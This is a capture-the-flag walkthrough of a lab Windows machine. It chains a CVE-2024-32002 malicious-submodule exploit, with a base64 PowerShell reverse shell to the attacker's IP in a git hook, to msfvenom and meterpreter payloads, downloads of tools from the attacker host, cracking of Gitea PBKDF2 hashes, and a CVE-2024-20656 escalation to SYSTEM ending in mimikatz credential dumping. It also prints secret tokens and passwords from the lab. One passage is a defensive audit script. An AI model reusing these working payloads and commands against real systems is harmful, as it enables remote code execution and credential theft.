Compiled
Recon
Gitea (3000)

It seems we have access to the source code of the web app on port 5000?

Great, that does seem to be the case. But the exploit will need Visual Studio :/
## Usage
Once the application is up and running, follow these steps to compile your projects:
1. Open your web browser and navigate to `http://localhost:5000`.
2. Enter the URL of your GitHub repository (must be a valid URL starting with `http://` and ending with `.git`).
3. Click the **Submit** button.
4. Wait for the compilation process to complete and view the results.
...
## Notes
**Important:** Before pushing the project to production, ensure that Visual Studio is updated to the latest version. This is necessary to avoid any compatibility issues or bugs that may arise from using outdated versions of Visual Studio.
Gitea creds: test02:test02@compilation.htb:test02test02
Users:

HTTP (5000)
As we saw in the code, we can send a git repository link; it gets cloned and compiled, and after that ???
After some trial and error I decided to review the request (should have been the first thing!):
└─$ listen 80
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.10.11.26:57300.
GET /letmein.git/info/refs?service=git-upload-pack HTTP/1.1
Host: 10.10.14.37
User-Agent: git/2.45.0.windows.1
Accept: */*
Accept-Encoding: deflate, gzip, br, zstd
Pragma: no-cache
Git-Protocol: version=2
The request took about 1-2 minutes to arrive.
Note from the future:
READ THE FUCKING GIVEN FILES

Searching for git version: Security Advisory 2024-046: Multiple Vulnerabilities in Git
The vulnerability CVE-2024-32002, with a CVSS score of 9.1, could allow a remote attacker to execute code on the affected device. To do so, an attacker would need to craft repositories with submodules in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a .git/ directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed.

The vulnerability CVE-2024-32004, with a CVSS score of 8.2, could allow an attacker, on multi-user machines, to create a local repository that appears as a partial clone that is missing an object. Then, when this repository is cloned, it causes Git to execute arbitrary code with the full permissions of the user performing the clone.

The vulnerability CVE-2024-32465, with a CVSS score of 7.4, could allow an attacker to bypass protections for cloning untrusted repositories. While this vulnerability has been covered in CVE-2024-32004, there are circumstances where the fixes for CVE-2024-32004 are not enough, e.g., when obtaining a .zip file containing a full copy of a Git repository, it should not be trusted by default to be safe, as e.g., hooks could be configured to run within the context of that repository.
PoC: CVE-2024-32002: Exploiting Git RCE via git clone
Blog: Exploiting CVE-2024-32002: RCE via git clone
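A defender-side check for the clone pattern the advisory describes, added here as an example that is not part of the original writeup or of Git itself: it audits a fetched commit's tree and its .gitmodules for a symlink pointing at .git and for a submodule path that would resolve through that symlink on a case-insensitive filesystem, which is exactly what lets a hook be written during the clone. The tree entries and .gitmodules contents are constructed inline to mirror the captain repository layout used later in this writeup (symlink `a` -> `.git`, submodule at `A/modules/x`); in practice they would come from `git ls-tree -r` and `git cat-file -p` run against the fetched commit before any checkout.

```python
import posixpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

SECTION_RE = re.compile(r'^\s*\[submodule\s+"([^"]+)"\]\s*$')
KEY_RE = re.compile(r'^\s*(\w+)\s*=\s*(.*?)\s*$')


@dataclass
class TreeEntry:
    mode: str                          # 120000 = symlink, 160000 = submodule, 100644 = blob
    path: str
    link_target: Optional[str] = None  # blob content of a symlink (git cat-file -p <hash>)


def parse_gitmodules(text: str) -> Dict[str, str]:
    """Return {submodule name: path} from .gitmodules (minimal git-config parser)."""
    paths, name = {}, None
    for line in text.splitlines():
        if (m := SECTION_RE.match(line)):
            name = m.group(1)
        elif name and (m := KEY_RE.match(line)) and m.group(1) == 'path':
            paths[name] = m.group(2)
    return paths


def _components(path: str) -> List[str]:
    """Normalised, lower-cased components, as a case-insensitive filesystem compares them."""
    return [c.lower() for c in posixpath.normpath(path).split('/') if c not in ('', '.')]


def audit(entries: List[TreeEntry], gitmodules: str) -> List[str]:
    """Return findings for the CVE-2024-32002 pattern; an empty list means none found."""
    findings = []
    symlinks = {e.path: e for e in entries if e.mode == '120000'}
    # 1. A symlink whose target contains a .git component: anything written through it
    #    lands in the repository's metadata directory instead of the worktree.
    for path, entry in symlinks.items():
        if entry.link_target and '.git' in _components(entry.link_target):
            findings.append(f'symlink {path!r} -> {entry.link_target!r} points into .git')
    by_lowered = {tuple(_components(p)): p for p in symlinks}
    for name, sub_path in parse_gitmodules(gitmodules).items():
        comps = _components(sub_path)
        # 2. A submodule path with a .git component is never legitimate.
        if '.git' in comps:
            findings.append(f'submodule {name!r} path {sub_path!r} contains a .git component')
        # 3. A submodule path whose prefix collides case-insensitively with a symlink:
        #    a case-insensitive filesystem follows the link (the `a` vs `A/modules/x` trick).
        for i in range(1, len(comps) + 1):
            via = by_lowered.get(tuple(comps[:i]))
            if via is not None:
                findings.append(f'submodule {name!r} path {sub_path!r} resolves through '
                                f'symlink {via!r} on a case-insensitive filesystem')
    return findings


# Constructed sample input mirroring the captain repository (symlink a -> .git,
# submodule x/y checked out at A/modules/x) and a benign repository for contrast.
CAPTAIN_TREE = [
    TreeEntry('120000', 'a', link_target='.git'),
    TreeEntry('100644', '.gitmodules'),
    TreeEntry('160000', 'A/modules/x'),
]
CAPTAIN_GITMODULES = '[submodule "x/y"]\n\tpath = A/modules/x\n\turl = http://gitea.example/hook.git\n'
CLEAN_TREE = [
    TreeEntry('100644', 'README.md'),
    TreeEntry('120000', 'docs/latest', link_target='v2'),
    TreeEntry('160000', 'vendor/lib'),
]
CLEAN_GITMODULES = '[submodule "lib"]\n\tpath = vendor/lib\n\turl = https://example.com/lib.git\n'

if __name__ == '__main__':
    for label, tree, mods in (('captain', CAPTAIN_TREE, CAPTAIN_GITMODULES),
                              ('clean', CLEAN_TREE, CLEAN_GITMODULES)):
        result = audit(tree, mods)
        print(f'{label}: {"REJECT clone" if result else "no indicators"}')
        for finding in result:
            print('  -', finding)
```

Running the audit before `git submodule update` (rather than relying on `--recursive`) gives the user the inspection window the advisory says the bug removes.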
Reverse Shell (Richard)
After some brainfuckery I rewrote the script a bit and managed to get a shell!
#!/bin/bash
cleanup() {
    /bin/rm -rf captain/ hook/ hooked/ 2>/dev/null
}
setup() {
    # Define the tell-tale path
    tell_tale_path="$PWD/tell.tale"
    # Set Git configuration options
    git config --global protocol.file.allow always
    git config --global core.symlinks true
    git config --global init.defaultBranch main
}
init_hook() {
    # Initialize the hook repository
    git init hook
    cd hook
    git remote add origin "$hook_repo_path"
    mkdir -p y/hooks
    # Write the malicious code to a hook
    cat > y/hooks/post-checkout <<EOF
#!/bin/bash
echo "hallo????" > /tmp/pwnd
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwA3ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
EOF
    # Make the hook executable: important
    chmod +x y/hooks/post-checkout
    git add y/hooks/post-checkout
    git commit -m "post-checkout"
    git push origin main -f
    cd ..
}
init_captain() {
    # Initialize the captain repository
    git init captain
    cd captain
    git remote add origin "$captain_repo_path"
    git submodule add --name x/y "$hook_repo_path" A/modules/x
    git commit -m "add-submodule"
    # Create a symlink
    printf ".git" > dotgit.txt
    git hash-object -w --stdin < dotgit.txt > dot-git.hash
    printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
    git update-index --index-info < index.info
    git commit -m "add-symlink"
    git push origin main -f
    cd ..
}
exploit() {
    # Local testing (not called below: the target app performs the recursive clone)
    git clone --recursive captain hooked
}
# Define repository paths
hook_repo_path="http://10.10.11.26:3000/test02/letmein1.git"
captain_repo_path="http://10.10.11.26:3000/test02/letmein2.git"
cleanup
echo "[+] cleanup complete"
setup
echo "[+] setup complete"
init_hook
echo "[+] init_hook complete"
init_captain
echo "[+] init_captain complete"
echo "[!] Done"
You need to create the repositories on Gitea first: one for the hook and one for the exploit (captain). The hooked repo is the actual exploit step, which the app performs for you.
TL;DR => Create repositories -> Run script -> Send the captain git link to the webapp -> wait a few seconds -> profit
Oddly enough we are in bash, even though I triggered a PowerShell reverse shell... hmmm...
PS C:\Users> echo $ENV:SHELL
C:\Program Files\Git\usr\bin\bash.exe
Information about the user:
PS C:\Users\Richard> C:\Windows\System32\whoami.exe /all
User Name SID
================ =============================================
compiled\richard S-1-5-21-4093338461-994521390-3704224775-1002
Group Name Type SID Attributes
============================================ ================ ============ ==================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
INICIO DE SESIÓN EN LA CONSOLA Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compañía Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticación NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label S-1-16-8192
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Winpeas:
PS C:\users\public> iwr 10.10.14.37/wp.exe -outfile wp.exe
PS C:\users\public> .\wp.exe | tee-object -filepath wp.log
...
════════════════════════════════════╣ Services Information ╠════════════════════════════════════
[X] Exception: Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
...
=================================================================================================
Gitea(Gitea)["C:\Program Files\gitea\gitea.exe" web --config "C:\Program Files\gitea\custom\conf\app.ini"] - Autoload
File Permissions: Richard [AllAccess]
Possible DLL Hijacking in binary folder: C:\Program Files\gitea (Richard [AllAccess])
Gitea
=================================================================================================
...
╔══════════╣ Installed Applications --Via Program Files/Uninstall registry--
╚ Check if you can modify installed software https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
C:\Program Files (x86)\Microsoft Visual Studio\Installer
...
C:\Program Files\Gitea(Richard [AllAccess])
...
C:\Program Files\Python312
...
Gitea (Internal)
Gitea configuration:
PS C:\Program Files\gitea\custom\conf> cat app.ini
RUN_USER = COMPILED\Richard
APP_NAME = Git
RUN_MODE = prod
WORK_PATH = C:\Program Files\gitea
[ui]
DEFAULT_THEME = arc-green
[database]
DB_TYPE = sqlite3
HOST = 127.0.0.1:3306
NAME = gitea
USER = gitea
PASSWD =
SCHEMA =
SSL_MODE = disable
PATH = C:\Program Files\gitea\data\gitea.db
LOG_SQL = false
[repository]
ROOT = C:/Program Files/gitea/data/gitea-repositories
[server]
SSH_DOMAIN = gitea.compiled.htb
DOMAIN = gitea.compiled.htb
HTTP_PORT = 3000
ROOT_URL = http://gitea.compiled.htb:3000/
APP_DATA_PATH = C:\Program Files\gitea/data
DISABLE_SSH = false
SSH_PORT = 22
LFS_START_SERVER = true
LFS_JWT_SECRET = ten8FWelzw36S77bYSUGlVCmrZn4jncN1ekaH1NoXO4
OFFLINE_MODE = false
[lfs]
PATH = C:/Program Files/gitea/data/lfs
[mailer]
ENABLED = false
[service]
REGISTER_EMAIL_CONFIRM = false
ENABLE_NOTIFY_MAIL = false
DISABLE_REGISTRATION = false
ALLOW_ONLY_EXTERNAL_REGISTRATION = false
ENABLE_CAPTCHA = false
REQUIRE_SIGNIN_VIEW = false
DEFAULT_KEEP_EMAIL_PRIVATE = false
DEFAULT_ALLOW_CREATE_ORGANIZATION = true
DEFAULT_ENABLE_TIMETRACKING = true
NO_REPLY_ADDRESS = noreply.localhost
[openid]
ENABLE_OPENID_SIGNIN = true
ENABLE_OPENID_SIGNUP = true
[cron.update_checker]
ENABLED = false
[session]
PROVIDER = file
[log]
MODE = console
LEVEL = info
ROOT_PATH = C:/Program Files/gitea/log
[repository.pull-request]
DEFAULT_MERGE_STYLE = merge
[repository.signing]
DEFAULT_TRUST_MODEL = committer
[security]
INSTALL_LOCK = true
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3MTY0MDEzMDR9.oQ3gsIgAi1_JTKKbw0lCKjwfcB3v7HvH6Wzb6M7dkE0
PASSWORD_HASH_ALGO = pbkdf2
[oauth2]
JWT_SECRET = XCXy54fFBqA-KAHA0Cjn5wp1gO4l-LY2-qgCS58VJO0
Gitea has a database at C:\Program Files\gitea\data\gitea.db. I upgraded the shell to ConPtyShell so I was able to open an HTTP server with Python and exfiltrate the file. The interesting table is user, which contains the user passwords:

└─$ sqlite3 ./gitea.db
SQLite version 3.45.1 2024-01-30 16:01:20
sqlite> SELECT email, passwd, salt FROM user WHERE email LIKE '%compiled.htb';
administrator@compiled.htb|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|a45c43d36dce3076158b19c2c696ef7b
richard@compiled.htb|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|d7cf2c96277dd16d95ed5c33bb524b62
emily@compiled.htb|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|227d873cca89103cd83a976bdac52486
We already have the richard user and, from the winpeas enumeration, he can't do much. emily is another user on the system and we should try targeting her.
Practical Cryptography for Developers: https://cryptobook.nakov.com/mac-and-key-derivation/pbkdf2
Privilege Escalation (Emily)
Crack the password:
from cryptography.hazmat.primitives.hashes import SHA256
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

ITERATIONS = 50_000  # Gitea's pbkdf2$50000$50 spec: 50,000 iterations, 50-byte key
LENGTH = 50
EMAIL = 'emily@compiled.htb'
HASH = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'
SALT = bytes.fromhex('227d873cca89103cd83a976bdac52486')


def encrypt(password, salt):
    # Derive the candidate in the same form Gitea stores it (hex of the PBKDF2-HMAC-SHA256 output)
    return PBKDF2HMAC(
        algorithm=SHA256(),
        length=LENGTH,
        salt=salt,
        iterations=ITERATIONS,
    ).derive(password.encode()).hex()


with open('/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt', encoding='UTF-8', errors="ignore") as f:
    for password in f:
        password = password.strip()
        guess = encrypt(password, SALT)
        print(f'\r{password=}{" "*16}', end='')
        if guess == HASH:
            print('\n\rFound it!')
            break
Luckily the password was easily found. (Use god level encryption methods, but users use weak ass passwords? EMOTIONAL DAMAGE! HumanOS do be trippy)
└─$ py emily.py
password='12345678'
Found it!
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o rev.exe
---
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > run
---
PS C:\users\public> iwr 10.10.14.37/RunasCs.exe -outfile rc.exe
PS C:\users\public> iwr 10.10.14.37/rev.exe -outfile rev.exe
PS C:\users\public> .\rc.exe emily 12345678 \Users\Public\rev.exe
---
meterpreter > getuid
Server username: COMPILED\Emily
meterpreter > shell
Process 2952 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.4651]
C:\Windows\system32>cd %userprofile%
cd %userprofile%
C:\Users\Emily>tree /f /a
tree /f /a
Folder PATH listing
Volume serial number is 352B-98C6
C:.
+---.idlerc
| recent-files.lst
|
+---3D Objects
+---Contacts
+---Desktop
| user.txt
|
+---Documents
| \---Visual Studio 2019
| \---Templates
| +---ItemTemplates
| | \---Extensibilidad
| \---ProjectTemplates
| \---Extensibilidad
+---Downloads
+---Favorites
| | Bing.url
| |
| \---Links
+---Links
| Desktop.lnk
| Downloads.lnk
|
+---Music
+---OneDrive
+---Pictures
| +---Camera Roll
| \---Saved Pictures
+---Saved Games
+---Searches
| winrt--{S-1-5-21-4093338461-994521390-3704224775-1001}-.searchconnector-ms
|
+---source
| \---repos
\---Videos
\---Captures
User.txt
C:\Users\Emily>type Desktop\user.txt
1c50f492d18f7b33db437efe72f60b30
Privilege Escalation (Administrator)
C:\Users\Emily>whoami /all
User Name SID
============== =============================================
compiled\emily S-1-5-21-4093338461-994521390-3704224775-1001
Group Name Type SID Attributes
============================================ ================ ============ ==================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
INICIO DE SESIÓN EN LA CONSOLA Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compañía Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticación NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label S-1-16-8192
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Upload and run winpeas again. During the enumeration phase the script died due to NFS Export Files? Considering the name of the box, it's worth looking into.

Get the version of VS: (src)
C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE>"C:\Program Files (x86)\Microsoft Visual Studio\Installer\vswhere.exe" -property catalog_productDisplayVersion
16.10.0
Dotnet version:
C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full" /v version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full
version REG_SZ 4.8.09037
Check the directory pointed to by winpeas:
C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Web\Exports>dir
01/20/2024 03:03 AM <DIR> es
01/20/2024 03:03 AM 953 extension.vsixmanifest
01/20/2024 03:03 AM 36,240 Microsoft.VisualStudio.Web.Exports.dll
01/20/2024 03:03 AM 294 Microsoft.VisualStudio.Web.Exports.pkgdef
3 File(s) 37,487 bytes
3 Dir(s) 7,200,944,128 bytes free
C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Web\Exports>type extension.vsixmanifest
<?xml version="1.0" encoding="utf-8"?>
<Vsix Version="1.0.0" xmlns="http://schemas.microsoft.com/developer/vsx-schema/2010">
<Identifier Id="Microsoft.VisualStudio.Web.Exports">
<Name>Microsoft Visual Studio Web Exports</Name>
<Author>Microsoft Corporation</Author>
<Version>15.0</Version>
<Description>Microsoft Visual Studio Web Exports</Description>
<Locale>1033</Locale>
<SupportedProducts>
<VisualStudio Version="15.0">
<Edition>Premium</Edition>
<Edition>Express_All</Edition>
</VisualStudio>
</SupportedProducts>
<SupportedFrameworkRuntimeEdition MinVersion="4.0" MaxVersion="4.0" />
<InstalledByMsi>true</InstalledByMsi>
<SystemComponent>true</SystemComponent>
<AllowClientRole>true</AllowClientRole>
</Identifier>
<References />
<Content>
<MefComponent>Microsoft.VisualStudio.Web.Exports.dll</MefComponent>
</Content>
</Vsix>
After following some conversations, it turns out the root privilege escalation needs a CVE.
Microsoft » Visual Studio : Security Vulnerabilities, CVEs
CVE-2024-38081 was the first choice as it is an Elevation of Privilege Vulnerability, but the description of this CVE was garbage! The only valid description I found was Defused > CVE-2024-38081
Next was CVE-2024-20656, which has a beautiful post explaining everything in detail: mdsec > CVE-2024-20656 – Local Privilege Escalation in the VSStandardCollectorService150 Service, and there's also a PoC: https://github.com/Wh04m1001/CVE-2024-20656
Richard didn't have the ability to query VSStandardCollectorService150, but Emily does:
C:\Users\Public>sc.exe qc VSStandardCollectorService150
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VSStandardCollectorService150
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : "C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Visual Studio Standard Collector Service 150
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Find the full path of VSDiagnostics.exe and update the path in the PoC:
PS C:\Users\Public> ls / -file -recurse -filter VSDiagnostics.exe -ErrorAction SilentlyContinue
Directory: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Team Tools\DiagnosticsHub\Collector
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/20/2024 2:04 AM 124840 VSDiagnostics.exe
Make relevant changes:

Note: Make sure to change the build to Release mode! Debug kept failing...
C:\Users\Public>certutil.exe -urlcache -f http://10.10.14.37/Expl.exe exp.exe # cmd
certutil.exe -urlcache -f http://10.10.14.37/Expl.exe exp.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\Users\Public>.\exp.exe
.\exp.exe
[+] Junction \\?\C:\44ea58f2-d0a4-484e-858c-abf4dd2b009e -> \??\C:\d0461bb7-bbe8-4fe6-903f-a2ebc72673a1 created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0197E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata created!
[+] Junction \\?\C:\44ea58f2-d0a4-484e-858c-abf4dd2b009e -> \RPC Control created!
[+] Junction \\?\C:\44ea58f2-d0a4-484e-858c-abf4dd2b009e -> \??\C:\d0461bb7-bbe8-4fe6-903f-a2ebc72673a1 created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0297E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata\Microsoft created!
[+] Junction \\?\C:\44ea58f2-d0a4-484e-858c-abf4dd2b009e -> \RPC Control created!
[+] Persmissions successfully reseted!
[*] Starting WMI installer.
[*] Command to execute: C:\windows\system32\msiexec.exe /fa C:\windows\installer\8ad86.msi
[*] Oplock!
[+] File moved!
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.37:4444
[*] Sending stage (201798 bytes) to 10.10.11.26
[*] Meterpreter session 7 opened (10.10.14.37:4444 -> 10.10.11.26:60049) at 2024-07-31 06:09:52 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1056 created.
Channel 1 created.
Microsoft Windows [Versión 10.0.19045.4651]
(c) Microsoft Corporation. Todos los derechos reservados.
C:\ProgramData\Microsoft\VisualStudio\SetupWMI>cd \users\administrator
C:\Users\Administrator>tree /f /a
Listado de rutas de carpetas
El número de serie del volumen es 352B-98C6
C:.
| .gitconfig
|
+---.idlerc
| breakpoints.lst
| recent-files.lst
|
+---3D Objects
+---Contacts
+---Desktop
| root.txt
|
+---Documents
+---Downloads
+---Favorites
| | Bing.url
| |
| \---Links
+---Links
| Desktop.lnk
| Downloads.lnk
|
+---Music
| cleanup.ps1
Root.txt
C:\Users\Administrator>type Desktop\root.txt
82d6553d01858c85ccdfff1fce9f9156
etc
Hashdump
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f75c95bc9312632edec46b607938061e:::
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > kiwi_cmd lsadump::sam
Root scripts
PS C:\users\Administrator> cat Music/cleanup.ps1
function Check-Msiexec {
    Get-Process -Name msiexec -ErrorAction SilentlyContinue
}
while ($true) {
    $process = Check-Msiexec
    if ($process) {
        Write-Host "msiexec.exe process detected. Waiting for 15 seconds..."
        Start-Sleep -Seconds 15
        $process = Check-Msiexec
        if ($process) {
            Write-Host "15 seconds elapsed. Killing msiexec.exe process..."
            taskkill /f /im msiexec.exe
        }
    }
    Start-Sleep -Seconds 2
}